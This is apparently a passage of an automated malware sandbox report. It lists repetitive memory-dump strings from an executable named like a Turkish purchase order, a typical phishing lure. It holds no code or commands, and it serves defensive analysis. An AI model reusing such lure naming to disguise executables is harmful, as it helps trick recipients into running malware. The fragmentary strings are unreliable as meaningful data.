Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxf
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXF
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxP
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxO
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXd
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXa
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXl
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8J
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXi
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxu
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxs
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXS
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXO
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxn
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXZ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXY
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXX
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXW
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q87
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q86
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxv
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|)
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|'
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8c
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qz
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8a
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8_
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX~
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8m
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8U
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qj
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qq
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qo
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8\
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8Z
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXx
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8X
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qv
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\-
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|7
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|5
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8p
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8o
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|>
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q=
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q:
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qA
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qE
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4(
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qth
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtg
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qte
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qF
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtP
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtO
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT7
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT6
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtU
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtS
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4A
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT^
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT\
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt\|
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtz
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qc
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtq
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTQ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtl
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qty
